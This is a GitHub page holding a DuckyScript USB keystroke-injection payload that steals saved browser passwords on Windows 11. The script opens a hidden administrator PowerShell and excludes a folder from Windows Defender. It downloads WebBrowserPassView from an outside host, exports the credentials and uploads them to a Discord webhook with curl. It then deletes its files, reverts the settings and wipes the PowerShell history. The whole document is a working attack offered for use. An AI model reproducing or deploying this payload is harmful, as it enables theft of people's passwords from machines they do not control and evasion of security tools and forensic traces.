-
Notifications
You must be signed in to change notification settings - Fork 2
/
Web2Discord(hiddenWin11)
96 lines (96 loc) · 1.78 KB
/
Web2Discord(hiddenWin11)
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
REM the only difference between this script and the other is that powershell isnt in a visible window.
REM be sure to wait till the script is 100% done to remove USB
REM This is V2 of the script, made for and tested on windows 11
REM Made by DEFHerobrine/DEFTech-YT
GUI D
DELAY 100
GUI r
DELAY 1000
STRING powershell -Noprofile "Start-Process powershell -verb runas"
ENTER
DELAY 2000
LEFT
DELAY 50
ENTER
DELAY 750
STRING PowerShell.exe -WindowStyle hidden
DELAY 750
ENTER
DELAY 1500
STRING cd C:\ ; mkdir temp ; cd temp ; Add-MpPreference -ExclusionPath "C:\temp" ; Set-ExecutionPolicy unrestricted
ENTER
DELAY 500
STRING A
ENTER
STRING clear
ENTER
DELAY 1500
STRING Invoke-WebRequest -Uri https://cdn.lullaby.cafe/file/webpassview.zip -OutFile webpassview.zip ; Invoke-WebRequest -Uri https://cdn.lullaby.cafe/file/7z.zip -OutFile 7z.zip ; Expand-Archive 7z.zip ; .\7z\7za.exe e webpassview.zip;
ENTER
DELAY 5000
STRING .\WebBrowserPassView.exe
ENTER
DELAY 1500
CTRL A
DELAY 500
CTRL S
DELAY 1500
CTRL L
DELAY 100
STRING C:\Temp
DELAY 75
ENTER
DELAY 100
ENTER
LEFT
ENTER
DELAY 100
GUI ALT N
STRING temp.html
ENTER
DELAY 500
ALT f
DELAY 500
DOWN
DOWN
ENTER
DELAY 3000
ENTER
ENTER
DELAY 1000
GUI r
DELAY 1000
STRING powershell -Noprofile "Start-Process powershell -verb runas"
ENTER
DELAY 2000
LEFT
DELAY 50
ENTER
DELAY 750
STRING PowerShell.exe -WindowStyle hidden
DELAY 750
ENTER
DELAY 1500
STRING $webhook = 'YOUR DISCORD WEBHOOK'
ENTER
DELAY 500
STRING cd C:\temp
ENTER
DELAY 500
STRING curl.exe -F "[email protected]" $webhook
ENTER
DELAY 1000
STRING clear ; cd .. ; rm -r temp/
ENTER
DELAY 1000
STRING Remove-MpPreference -ExclusionPath "C:\temp" ; Set-ExecutionPolicy restricted
ENTER
DELAY 1500
STRING A
ENTER
DELAY 1000
STRING Remove-Item (Get-PSreadlineOption).HistorySavePath
ENTER
DELAY 500
STRING exit
ENTER